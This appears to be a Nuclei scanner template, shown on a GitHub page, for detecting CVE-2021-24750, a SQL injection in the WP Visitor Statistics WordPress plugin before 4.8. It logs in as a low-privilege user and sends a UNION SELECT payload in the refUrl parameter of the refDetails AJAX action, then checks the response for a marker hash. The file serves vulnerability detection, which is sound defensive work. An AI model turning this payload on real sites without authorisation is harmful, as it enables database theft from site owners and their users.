-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2021-24750.yaml
43 lines (37 loc) · 1.47 KB
/
CVE-2021-24750.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
id: CVE-2021-24750
info:
name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
author: cckuakilong
severity: high
description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
reference:
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-24750
cwe-id: CWE-89
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "266f89556d2b38ff067b580fb305c522"
- type: status
status:
- 200